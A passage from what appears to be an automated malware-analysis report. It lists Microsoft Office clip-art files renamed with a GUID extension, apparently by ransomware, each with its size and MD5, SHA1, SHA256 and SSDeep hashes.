SSDeep: 384:gwzEB45/M9XiJvGcReUNdcO9Aho0RrCm9LnvmWmNrPMqQqgbrUsFtL7KQAT6RvQ+:g/K/MgJXVJAho0pCSLnv5mNrPP7gb4sX
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107526.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.76 KB MD5: 10e194bf7f7a46c8189676dbf98be4db
SHA1: 5fcfea7ee27d99f5baebcd52ba30ceda15a5b159
SHA256: 198f1f75522739051b7c922d9370e8ac8dfc636687f484c9dec1e5a6530f5ed2
SSDeep: 192:696kQeikN8Bxje+7hgDft/sk1daly/wulZO709hRE/q/XwdYITl67qDv0Cq:696kQeikN8Bb7hgDZsEdiiw5709hRiqz
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107544.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 26.14 KB MD5: 7267f99593f5310a3f5bbdc821d76b55
SHA1: 429cb15228fa7928eab0fa917ec537075222acd2
SHA256: 2d8a12283406e429ff65031c6e0c9daef2bba3c3dfd04e8f26785ef51e41b191
SSDeep: 768:hVZpYJR7hKydVEdYukogUTuJmsYvP8mFfvGokuxBtullFodaNgZZg7C+VbME2HNH:aewbYrmJruT30C
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107658.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.91 KB MD5: bef1278d61c3e13f4e960810ba8b3d1f
SHA1: e4a094918c6678b7e953b491733a02c2a5823937
SHA256: 8a6cee1ca14117b310a7738f9462d56874442bee5b0513ab3cb02c235d34563b
SSDeep: 192:GFmXyToTKBgS7xx8tF05xFphGp7nY0LonTg4uQcmXgKiiD:G8hKzx8F05PphGRYiOT3uQcmX5b
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107712.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.53 KB MD5: ebda1a96ba249ed0f5c85d4a40cefc32
SHA1: d2538f8eb5005ea19e3417d21a6ab5029ab53aef
SHA256: 177adc65310d70288268042dbf26ff7276e77e2c2ff01e9c68a5963d71f0c7d9
SSDeep: 96:SJrKauDFy7qbOoySVG1OXEmiHm/2l1bc7xJZb0ggmtum+Kw1zSS87Fs7Y6I:orKaQFGqqopGsXEmiGewHWjmtumVw1zi
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107718.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.71 KB MD5: 4ca178fb698050cd53e11b44568d7c3f
SHA1: 09e2ecffdf7b3d9bf6b64134fb18b6ad70b1b9e2
SHA256: 5d11c2565237de6502011612eba84914ce979c841dfd2dfddf27313ed2c2cb4d
SSDeep: 96:qJWf8j5IqDm353vBLHq1ysDClNRW2bgghqKDxeo:wzjuqA53vBLHq1yCCLRW2cg08/
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107728.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 5.36 KB MD5: 2e3abf704909de11090ba93ceb6e4b0d
SHA1: 7b55057e8e44ea9b553f65dba0f45164c5215629
SHA256: 28b7e4436da48ecc9aa827f87651faf56ce53c47896269d7234cd8ab62343872
SSDeep: 96:SJCo2aMTTH5Q8bddToUFLGVEbYqHtT7KXLwe8pjBL1zcVleppqg1UbzGqokQhCyi:o3PETH5Q8vToUF/bFHtT7K7we8RBLYQ6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107730.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 2.99 KB MD5: 762c15595e4091647e74dbe1edeb7695
SHA1: 7765b1d69190e247a9d7f31d22f5cdde6807f001
SHA256: a60214b6bbfaadf62c6e5901a5f14512781c524a46694c597e95d3e6e66cd481
SSDeep: 48:1tjWB4gYT8EhuQjSx01O5RamJlIyfnZPc+1ZhtYtDm/DjhOxcyHtGKmPSqRmwmjg:DIJkuQjO005Em/IOBNvtcD0/hoFH5mPb
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107742.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.56 KB MD5: b1185243d4582648dfb19c2cc9903411
SHA1: 14ff0fd2210b7fbcf0e58aca8568814eb3f8377c
SHA256: 96265c98ece34ff2602f688ae9edc8f32e708b8495f56399bd6360735e605b77
SSDeep: 96:eJzqKzqWRk6z/pbS0t0+k0zv4od48xbtI5kShmEZ6q8Cew8Rqo:UmKmWRB/xSk0b0Tn48xbyuSwEEq9ewC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107744.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.89 KB MD5: 85f497cf9c462d38b4a2c08010c56bb1
SHA1: 327b4b5eb1383f165bf58eb2c703d51f88a2948a
SHA256: 9b5d0c297d012c08785cfd30690c94d3f93bca24b9e0fd456b30ebe09a5117dd
SSDeep: 96:kYJeZad5a4yYnWyA7caqzLbZri9Imjk1s/IGxcmc8i9ZZzvL6N/Us0zm:k+eZad5a4yEY7caiBaImjZAucrZwcq
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107746.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.68 KB MD5: ef06619d08fe99d20f3a7f8d58428ed6
SHA1: 899e393ffffed499ccd46198b8d1a7a7d6572312
SHA256: 3428a608df8b640ade62699af9bd4706b099070dcd7f67fffa5a993a08ef9ab4
SSDeep: 96:t3J14Lkl8La1yJZhQ8ct5VJ6EMgA/nNRWjaXbT31ccmVJwjSqFM1eFnGHhgFH/Zx:tZ14LkqLa1y9Q8ct5jZMgAFRWmXbTFwA
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0107750.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.61 KB MD5: 816de2f191f7cba91cfd1d86e2fa50b5
SHA1: aa881113239c19b6cb47f08fb6fa0e066f659c62
SHA256: d30f96c58efe9f97dc9b6684dceb41dd1e5281c599c672c29b8c08ca0f615008
SSDeep: 96:8JkC3UWA2sivbD+jSL4crqtjvrP2vSL+VwpmHeslYrZoUyM4niETJ+tHyQz8uNVG:yr3UF2sivbD+jSLFm1TOvwqSm+s+rakO
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 32.87 KB MD5: 9d7cfca66d8cab9f418cb5a28ea68036
SHA1: c9b0a09a7f59d4c654744f9bcb72b19f1da18036
SHA256: 38729132e03be73f7f7518e1ef895174015ed45a370f0b9a9e6513e8b3ada77f
SSDeep: 768:dWpTKgjy01DFafmClVFa0Xpwswhi/9xEJ9uEuh9ZbpC6:dWpOg+01DFafpVU0b/9Ykh/NC6
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145212.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 60.19 KB MD5: 35a0a73c156f1b844800dd52d1b0a012
SHA1: b0d899287d8108f2e836efa005b95460260096ec
SHA256: 20c4bc46d97fd12fe35c3fd2c0ce5cad6d09e69bdfc735346969b2b98196db9f
SSDeep: 1536:PPiKsRqt6PE83jl2sju60KX1MI7qb9+w/h76FqBUMXqxUA:PK1R5X8sC60KXeb9+A+Fko+A
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145272.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 48.08 KB MD5: dae0074a8e87b99f2add3e069c261f4c
SHA1: 27d5f62feaf3ed9f823f477d4a832f31461e0988
SHA256: f99bde890a8c419ba83e30ac4cd5d6a431e5e631b8ba1e785bbe3c225da5e2e4
SSDeep: 768:iT6L7TbuPsvYWB22peAx9UiLdGBTgSjDgVY0Uu9Z9aaOv0d7oeR9mQn1R:iub4lYxxLdEkSy47vA75tH
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145361.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 20.63 KB MD5: 4f4c8690c26e90e282000e1b08142d7d
SHA1: dc6a6f88c44318aad56c161064a2ae40cac69986
SHA256: 411e1fcffbb3793a501ec53f42b31935ae0e54a0cb63ff48b1a345bf7937f0c3
SSDeep: 384:UZRPm/9Xt1EzGzapJ6XU5fvqAeSyIlKQJW8N/fCg3YJ3OXpr0:gmFb3NU5uSy5QJDh3YyI
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145707.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 35.96 KB MD5: 86608ea4a293e976f90f5c9a815eaf79
SHA1: 0668f587c5b77e3a078380e675b4da883f06bf5a
SHA256: 6228495eb3b7b17fce594f43f6be03c96a09682d9b2d4fbcbbcc7ba0f9ec4c0f
SSDeep: 768:R7DCWabrapxjoU81Kbrim6ZmdeNly5hLNACHhEehre+Tv:9C/PAjoDe6Z4eXy5VWoxI+Tv
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145810.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 35.93 KB MD5: 9d84bbc4877dd87eb49dfbaf2600381b
SHA1: eaa4d2e22734fad15c0ad77245084ff61ffa23d8
SHA256: af3db9a3ba2ba5fb2d1764b413428c71e3537c601117ad1c94a1d792c5733f63
SSDeep: 768:TOj73vsFUZgRi90oPG9GG03LXbRCLpaBU9ECH7NKRqaf:CjzslRS0SG0G03LrRCLpaBUcRDf
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0145895.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 33.16 KB MD5: bbc8217cc6980cb171a687a19332b348
SHA1: 644aca83387424cb380ed46fa7ceea29a8cb42b7
SHA256: 068be57dbee2f280bca1f84e4ccbba12e662df3918f70d1f9474102ac0800060
SSDeep: 768:VBk1e1WYy5syNHMuoXqEhGefSXSbSu3VPeNcL+tzl:VBk1e1WNsyl4fwRSbSu3VPeeGl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0146142.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.42 KB MD5: b78aff98136c03588270a66a6a08a367
SHA1: 71427a90e8fa75702b1c330a61431b0aec275a13
SHA256: 0283046d21445d22a4cb34a3298d17db7e5099847e0c8ddedfb46ad1955c8467
SSDeep: 768:FJgT43dZKS5wKhCde4ED4RCSpVMTq9AWGi5s2QzTsgvewUfrQi+D4ovA1i:UT4vX5w417SpmTq95G4xKsgveNfrWD4M
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0148309.JPG.{3EC7AD33-C616-54FC-3819-FD033E71F165} 42.65 KB MD5: a3372017207e25e5ddde542ae9fc7be2
SHA1: 039f705a23c239add191a82e98e7016632c47fcd
SHA256: 8c5f53e002af32994b6e8ab9b9dc089e3a9fbdbbd7e1c9e1a57ea7d3e96115fc
SSDeep: 768:WPzpNFGuDhzVWmCigxdSCAJckY4/67YnaoaVxXAR//2ZcLrCIpjVa2cegul:WPHLhzVWmnwdSCAqW/taoabXg2ZcnC2p
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0150150.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 45.32 KB MD5: c323aef8e88ad3805dbba4c61557d9f5
SHA1: fc4a2d62a1586e72a878d4f347c6d5c88ed038e8
SHA256: 9680e624510dd49ba9895ef946bea236ab3b51ebe19ed01eed14edb8442ca760
SSDeep: 768:I0npwiWi36e8GY+5p8RPgx0l8iYeKLLEsdxGPOmdc04+xc8Fo1zYyuVacGT/L79a:3yA63Gd5eVgx9i/kbviOcrBxHo1zluVr
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151041.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.25 KB MD5: 391c6faf40158728ce4b76caf5f76ba1
SHA1: 396ee42ece61d5914f36e4addab4b729b8a78b85
SHA256: b9b841f8439f3f4d517108ebbb4f3b6da59352f946e3decc3f0f2707edf037bc
SSDeep: 96:Qay6JmeTuyYIuGyhSi3TaFJHy8yGMrbi3WOC1nBSZXgr6QZtP3KbsXnaq1rpk1R3:NTVTuouGyhSioRjMfi3Wl1nBSZXApZtq
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151061.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.59 KB MD5: 105acdd0b1a35d7a9e0decab26712fa3
SHA1: 8edb4dcaa9af86622cb57be992acaeff02ed8663
SHA256: 75f1acf297c57a02c37582fa51ed85f44d42f11ce5177ad37cb46ead5b106aec
SSDeep: 192:nyZ3P31hg22adUEueWE+YO+eIdsNTAzA7TKZiqrRCoXTDZLn5:nk3v1NtUEue4YOdId2kUPKxrEoXTtl
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151063.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.38 KB MD5: 7ad04b26549d51d738c33edfceebf586
SHA1: b70d0080a87c4f12d15e5b55b2ca84e88f569b5c
SHA256: 3fc58d795b9ff9b9275eea3905aaf73d9bd7222e948e6bcd1d38f329c995efdc
SSDeep: 192:tn70/GxkGtm//iaLhOKflZUmToJTeDTIT7T1LT9ToTtT8TQjT0TTTcTcrTJT6Te0:tn70uxk4s/ia1OKflZpWUsf5xs5g8jQC
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0151581.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.50 KB MD5: f777da22262b5e36a76ff8cba24c9ae0
SHA1: 23f7daee259f097e50dc79c85aa813886a5a6509
SHA256: 0788cc8a32ebaa8812ff68f2f1877a23f8dbf0ef3b5befba2c0db8aa377ad144
SSDeep: 192:jcnb1Ok51c3ckKTFshcJ3qqxgQ+f6oyh7dwpuAXfc+FzYWq6xHiEKOGS2DLpw8kL:jcb19Lj5shcNqWgQ+f6th7dwuAPc+5hz
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152414.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 24.26 KB MD5: fc407abb3f93433b3c3ae30caf1e4289
SHA1: 49e6289f1dc798f97ab4d9def91e0ecbb91bd5b9
SHA256: 68018b1ecf126c3e8e2c66ef79c366dd75659c785d88fd73a4fc8b4d57922cc7
SSDeep: 768:tlUynRmMDMd996e1hhFN00t2vIAffRFl5SIshQwZEOsHnn7PWw6tXhGMotVSuKbF:cyReHrtOjHsFgQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152432.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.11 KB MD5: f9e856bef63db969d0bcef154f73d94e
SHA1: ae5e38b788a8dfec3564b890b69a6c68f2f6eb5e
SHA256: 97b621c02495840c909b45d39d3ac4f8e1b606fec12155cd40345878212b5495
SSDeep: 384:jzjsSDsO3Z3fBfF5uN9EuOMdeLschGLX95JwS8igFtQFl57AZRLZn1jwSxPG8xXe:j3sSQ2FfBfF5uN9EuOMdeLschGLX7JwY
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152436.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 11.08 KB MD5: d4736a3509ded20659ce7f97d0bdda2f
SHA1: 1ab1cfa57be2b39d072b951b907b2615fe9821e1
SHA256: 4af7748559f2127b5d2975154b9d86adb55186933f4577dd2721b39e96a06b99
SSDeep: 192:TvR2vqK17yxN8XHjRVHQ3LCLDXUTBpI4TJ+MZaVoKtguDheLX5lOsXPNabi9yNlJ:TvRUqsyzKHjRy3LCvk1pI4V+MZayKtg+
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.05 KB MD5: 9521d6973cb08cbeed01cc97d15c37d4
SHA1: 32fd41221a75cc88f23202d54c3c7342011c7cd0
SHA256: ba8acfc87eb13e1074628d1ddb5e928091412da9e81e18216189d1e8d2cb8a18
SSDeep: 384:vHDz2EAfr7+5MiW/fbkuZie9XPNCqOSVoNef9h1QPP/b2rMMM3kussKjp3Waw/9j:vX2EAfr7EMiWrkuZfXlUSVku9LQPP/bD
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152558.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 15.68 KB MD5: 6f29c01befc64250b3579943c8b1d9cc
SHA1: 8d4810d8e6834fc27b8430371e098cda93383c8f
SHA256: b716927eaebc2b5f52e1bbccdc40d5707804be9ffd45e4dbce8307164daa7a0c
SSDeep: 384:0MfSKnbmYaVMsgnL1VoYjIq/Zb8RYTdpjIn5cU3NUPjXxr/qjOBZqZcCXeo1S/DW:0Mq8bmYaVMscL1VoYjIq/ZbEYTdpjIn3
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152560.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.63 KB MD5: 46ab16eff18023e78c32d3e50cbf2213
SHA1: 70aa1f95758a942518753022c9583ae70bd4b603
SHA256: bbb4af18dbc4aec3be361a33fd882be7ecec060d16ef3812640ff51889669c39
SSDeep: 192:KO5eHz+e02SgI7xIEx5STaEZhr6MvxPRHpydK6b8XjGC+M2HQlza4O+mEIfs4L4o:KOYz/02Sg69QaEZhrBvJRJydK6b8XjGt
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152568.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.61 KB MD5: 997d3243cca2aec6fa14da0e323eaa87
SHA1: 13741829683411b59764fa116baaeba3a7ce9f77
SHA256: 35153776028ccb1efb1fa181b9dda93b6a382843e6c3694a8c6f5f08d5d8f1f0
SSDeep: 96:PJcFJpwNIcLviL4xrKx6hifFSwZmoN0RycKgjrtQudWPK4oARwzipnlhb:BcMr6LorKxvfQwbN0UJgvtQudkh9Rwmh
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152590.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.68 KB MD5: f0b5e1bf110a81a49df0bd234bd550dc
SHA1: 8906f43e86cdfb5c8b4724727dd5e578a24ec262
SHA256: 04fc37f4c92e11f6539a8049407d7faa3cc3fb099922a2d4bbd9bcf5c07898fb
SSDeep: 192:EyEqPiqkDpwK3Am9gQNjXF9wP8ezRPobGZ722JgunS/b4j/c0njU5cG+/mCkXWK6:EtYkFZfGK5uP8ezRPoCJ22Jnnmb4j/cy
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152594.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.19 KB MD5: b1f261c9281c2b34774fcba95aa75963
SHA1: 615c29bc0c1bb9338e0af519cce59c26bace3b5c
SHA256: 551a65be9d0b02c010d419fa372118bf7eaadf2eb4a1c74d4903f3922ffd31c3
SSDeep: 192:v/tTvdfZFyomBJ/l2q21XZyGam4UOqYHt/4RLFzITOiW:v/5lfZFFeJN2q21JyGamFOqkt/4RhzmQ
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152602.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.13 KB MD5: 3fc862df34ae96f7b1b3a8b7c2241d20
SHA1: 3764477487537f3e338031eb8cd54aaa4d76f5ac
SHA256: 3abab5089ec5cceff88036772cabc9436ad6041a8b58b78cb0cfa78f4dee5adb
SSDeep: 192:IqjDLh03ZQ4Ihz5GTEV3ATzVH9xKV+W0iM17lAS:I2LS3al12EVQXp9xKV+//17lAS
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152606.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 16.24 KB MD5: 61c59660fb4bd376e71d5ccbd2b9bed9
SHA1: 399907b02d1a4a5f99b975d200d126137704f1f6
SHA256: f5219fb36087d18fea0f27ea97903d8cbb23953339901b9cb7cbe19808fb8a59
SSDeep: 384:u3Zcc4Y9XafCyqJsWeEKq+Pj43RHHKqpe5LNziNrVi11TnqzVmDuz8adRLZkvcW7:u3Oc4Y9XafCiEKrPkRHHlpeRNuBVi11/
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152628.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 30.09 KB MD5: 3c7d19c044dc0d0f258c9134e5c5d297
SHA1: 7c42ca8d5a34f54ce5ca472b037fcc5a2f6108c5
SHA256: 33439509db74587057701aecb5928279db17a2243ffffd41b96e1cb98c10ae39
SSDeep: 768:HlmxdefetBokAQKDvQVCZhSoETeLoJwfiVlv8UFiiTR/BJDu/yTbukddyBL65RH/:lOMuGWeD7yvjd
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152698.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.18 KB MD5: e639fa21962f1a4c5fcce6324a523844
SHA1: a4837ace117abef6438ab7babb1d8682c9a78dac
SHA256: ef77e9f160186f638590ad17c529c9d0f6ca0f96791dd95034cde4e65d4cf5fd
SSDeep: 24:t/zKi0Ld5IB4gXoim89uohd1Lnw2CTZH2CxhDbaIIV2Comzqy2CTE6u2CTGzw2Cu:1zQ0B4gYT89L3E9RbKotqo6u+EfW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152702.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.18 KB MD5: a6058834143679e9747c25f38f75a644
SHA1: 8db593767483d23add351823affac5f6e074b03d
SHA256: 0791b1dea5d650117178fa1a423f2b5638f15b8f1caa225d7bc1da3fcee3c667
SSDeep: 24:t/J0v5IB4gXoim8aH9w2CaKuqaxH2CaR2n2CaJ772CaVo2CuNx2CanPn2CaZX2C7:1rB4gYT8CGZ1w7M7NdGgZo2W
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152704.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 1.61 KB MD5: eba576da56df420b248c77c0cae93fb8
SHA1: 82f72e9fe49f4e31f7a30142adcbf4305c1fb8c5
SHA256: cfcbbbfef7442cc9ce2e242fb3f19691c03570ada29e9ae3e684f3b2af28aae9
SSDeep: 24:t/u0v5IB4gXoim8qYl9Rw2CY2C/2Clm2CSQ2Clt2C9mD2CqV2Cw4m2CSP2CMg2C6:18B4gYT8qiCsplGSkh9EsKAMUlkWzW
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.79 KB MD5: 10d997a6ba42ed3b6c43adb94f443cc6
SHA1: 136873d551b10d072dc19c750baff1c558868345
SHA256: 4a1cf7753b2a883942a72e43f76b0c2f50b71012e412976b5244a01c440e44a9
SSDeep: 96:/Jlc2QoIRp54mGNP+DgLecyS/5M9ElEA8bAZy5DgodLzWX12Zor5Wg4:xld1IRp5JGNP+DgLecyS/5mEuA8bAZmt
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152716.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 4.47 KB MD5: da02d7a5eab80b941b365e4066626172
SHA1: 382e4366c23c45532b1dfd844dd7795979ca230e
SHA256: 23bc7764de8e829a4eeca3c311cf8a0a3ca86cd52ab15655a00eb0701487b125
SSDeep: 96:lzJFIIvsydNPNWejSA9+Sy6FZmo+tB+z505c8jaMd05DWXoMmA8GryyMn6bR:llKAsyLNn1+wHmo+tB05bFMC5DWYMmzY
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152722.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 6.86 KB MD5: 71a650169fcee0ad8fec00363bf914a5
SHA1: 4e3d1951757c118c2d393141b119dfba8dc68dd0
SHA256: 26db400ca328d61e305cbe48feaa682a48c39275b19c8d8363151ba64bb98d66
SSDeep: 192:J5SrpVdSljiibqomdegkIjHO7Z8m/UWsLw0Eu7IzrfIOVHSU79Ul53w/kyAlJ5EY:J5CVdSlN2oCk8Hct/UWuw0EuMUOV99UD
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152878.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 14.54 KB MD5: a6e997e71c666ed95d2e87f92d2280f2
SHA1: cf4c5a57fa55bab833f6f7c68ddaf082f005140b
SHA256: c5acb53a83015c7594791ea51f9ec1e8af84f783656a5d16ec013b2f61aa52a3
SSDeep: 384:DSqM1z27pSc2LmDwSCeJUNQRgUkjLGuDvamDR0MDlAox1vxIozWrHkkHOu0J3VXb:DS11z2oneJUsgnjLGuj3RplAytxxWrEz
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152882.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.86 KB MD5: 92eaf7e72014e759382a0622a8e9a39c
SHA1: 37bbcbcf4d39a51a5254818a4cebbe947db2fc3f
SHA256: 0f46219b6175a623c045c2c976b8823f9f9d93487f4f085c508d9fee5d587887
SSDeep: 192:rO4Z5U9dSrKGFU9foF2gJuU/jNvP40q21RJ4SAqTz+UL/OG6mR7gnImDq/qI:rBGDSWEU+F2gwUbNn40q21RJp1f+UL/5
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152892.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 10.42 KB MD5: aea5d5a1c7feec27f266407c0d6ce0a4
SHA1: 755b96f5e6a3f848ec574c5bb55381f4d54c5bd8
SHA256: 00d2c19dfc09a80b2834b29873b0987f4bd63d33cd7a8429137c8e6a95258aff
SSDeep: 192:ox5go3SeFrtgFYYNVM181sVhALr57B+Omq/B42hihrye0zd2gc7tGP4y344j6wS6:uyoBFSFYYNVweWALr57B+Pq/BJiye0zF
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153089.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.67 KB MD5: dafc82f6109785d69372dc945deb63e8
SHA1: 0ca9247091951a3cda639249886376e530e940de
SHA256: 40ed69161f19d4852ab560f9aad6af416baee1446d5be2cd71b199ee0ceac388
SSDeep: 192:L8TEJqeT+SJjqnleolqwgW9wsGVaFJNhEHbcFgUQ+VONYwdkHvU:L8iqeT+SQleolqUMVaXNC7wg7+MGHvU
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153091.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 7.95 KB MD5: 4173c805548f4f615927a9bf207c21f9
SHA1: 7065fff1dd69f68b5a00120be11bca1f3849d27a
SHA256: 343acc6282050dc0fa52bcc4aa9f404a5638bb7d3b3b7cad0eb81cc30213875f
SSDeep: 192:QBKw6BaDlPJXW5MWuXybJbtjU/RQUKZx6ITprzd71aCGw9Z+xwNgmY2CXxnm89JS:QBr6BUB2YibJbRU/RQUK/Fp7sCP9Z+xe
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153093.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 8.67 KB MD5: 25fd2e3dfce44dbe4116ff7e3f18b0db
SHA1: a08fdca111dc629eb57292ea2bcd99dbb5334bf1
SHA256: c5e02795e3c78e2139245d86872f8b58915c7c220e6d140dc3a01562817a8338
SSDeep: 192:xQ2DlJLtkl+RKBqSOuzlBXRpyTl3wayPiGhq0mgw/cbt+9DBY1RNu7X+bM0gK2Q1:xQ2Bhtkl+RKBqtuzrXRpyTl3wayPieqw
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153095.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 3.62 KB MD5: 7e2fb55c9616d68fac4d680b54011d83
SHA1: 4ffd83b2bc59c97dd82667c7d7819ca9265443db
SHA256: 13273ae2b6663af0c0cf6b93932deb38c976d90deb0a8f432e6c96c38543e5ce
SSDeep: 96:4J2yYYWunxzRNuWmx5im3rXCO6ZkqxX9s4H2JR1fhXmLQu:e2yYYWUxzRNuWmx5im3rXCO6Zk+JH2Jm
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153273.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 19.63 KB MD5: c24525200b5473e59b0d005526daf0d8
SHA1: 56e11c6d86c45cf34d6714cc6d76b28fc102cafc
SHA256: 62370f7513e6caa2532d3d80ef562483cd3dc6adf2cbe64a14f178c1dfa1f99a
SSDeep: 384:AOTBuE1ORQj3XwkibUTPa6JOKpSHiy6oGKSYsgMvqNFF2DPL92ui/gWFqB9j/daf:AOVukORQj3XwknDO8SHiTVYsgMiNFF2S
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153299.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 35.76 KB MD5: fd688c35ba8ef409f5cdcde4ef90d73e
SHA1: 4a8d9416fdf69d4f6e2b44da89e7f470544539cd
SHA256: f10f37f4e0eac0667e043dc12aac27f765b54259f4c06cafb34e8002f0192739
SSDeep: 768:glVxjS+BTbxLcm6DIS6KUKMT8kz+L9IYyEKntpDF2M8p0o/RvV8DbtuPWCur5JV4:UxjSw94m6VKz9l8NTDepS
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153302.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 30.08 KB MD5: 7aee39cfe8c9bd8014426a4ec4febfc2
SHA1: bb7f1ecdce1170d96c6e01945ecb03f478a51e56
SHA256: c8fb35c900bfebb24a0ce08537aa62e0b792dd4ec876954049eb775f8ab58745
SSDeep: 768:zlu7zCaNQ3NRCMAIRumFkd8a91RDTTq8N9E6WbY5IFQYVGHjpU4Qwm9+XS63mJfm:gfBMp8ZpCMttq+Rn
False
C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0153305.WMF.{3EC7AD33-C616-54FC-3819-FD033E71F165} 37.59 KB MD5: 52f6c3a8351018edc81e52934d58444a
SHA1: ff13df0852f42dcb9f1b8ac2b2f17430ebc059db
SHA256: 4459645554a7343536d71de6259820d0407c4133e30bcec07e91bea9fe8b4bfd
